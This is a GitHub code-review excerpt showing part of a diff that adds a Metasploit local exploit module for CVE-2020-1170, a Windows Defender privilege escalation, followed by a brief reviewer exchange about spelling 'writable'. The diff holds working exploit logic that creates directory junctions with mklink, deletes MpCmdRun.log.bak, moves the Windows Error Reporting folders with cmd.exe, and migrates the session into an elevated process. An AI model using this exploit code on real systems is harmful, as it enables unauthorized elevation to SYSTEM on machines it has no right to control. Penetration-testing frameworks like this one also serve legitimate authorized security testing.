modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,223 @@
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction(original_directory, target_directory)
+    print_status('Creating the directory junction...')
+    junction_creation_result = cmd_exec("cmd.exe /C \"mklink /J #{original_directory} #{target_directory}\"")
+    if junction_creation_result =~ /Junction created/
+      print_good('Junction was successfully created!')
+      return 1
+    elsif junction_creation_result =~ /file already exists/ # If the file already exists on the target...
+      return 2
+    else
+      print_error("Directory junction failed. Error code was (#{junction_creation_result['GetLastError']}): #{junction_creation_result['ErrorMessage']}")
+      return -1
+    end
+  end
+
+  def delete_existing_mpcmdrun_file_or_folder
+    mpcmdrun_path = 'C:\\Windows\\Temp\\MpCmdRun.log.bak'
+    result_file_deletion = rm_f(mpcmdrun_path) # Then we try to delete it as a file....
+
+    if result_file_deletion['GetLastError'] == 0
+      print_good("Deleted the already existing #{mpcmdrun_path} folder on the target successfully!")
+      return true
+    end
+
+    result_junction_deletion = rm_rf(mpcmdrun_path) # And as a directory junction or folder...
+
+    if result_junction_deletion['GetLastError'] == 0
+      print_good("Deleted the already existing #{mpcmdrun_path} file on the target successfully!")
+      return true
+    end
+
+    print_error("Looks like the #{mpcmdrun_path} file/folder already exists on this target, and we can't delete it.")
+    print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
+    return false
+  end
+
+  def move_folders_out_of_wer
+    relocation_dir = "#{datastore['WritableDir']}\\#{Rex::Text.rand_text_alpha(6..13)}"
+    print_status(relocation_dir)
+    print_status("Making the temp folder which will house the folders that we move out of the WER directory...")
+    mkdir(relocation_dir)
+    register_dir_for_cleanup(relocation_dir)
+
+    print_status("cd'ing to relocation directory and relocating the folders...")
+    cd(relocation_dir)
+    print_status("After CD...")
+
+    # I was going to use rename_file here but it doesn't forcibly move folders when
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp .")
+    print_status(move_folder_result1)
+
+    print_status("Changing directory back to the writeable directory...")
```

Comment:
```suggestion
    print_status("Changing directory back to the writable directory...")
```

![writable ](https://user-images.githubusercontent.com/434827/87173547-49eba480-c319-11ea-813e-43f01c05e9ff.png)

Reply:
https://www.dictionary.com/browse/writable <- Both ways of writing are correct. Or you can Google for this. Essentially most people agree its fine either way.

Reply:
> Or you can Google for this

![writable](https://user-images.githubusercontent.com/434827/87176576-a650c300-c31d-11ea-84f1-a05cc702cf57.png)

Reply:
Eh fair point, I'll correct this.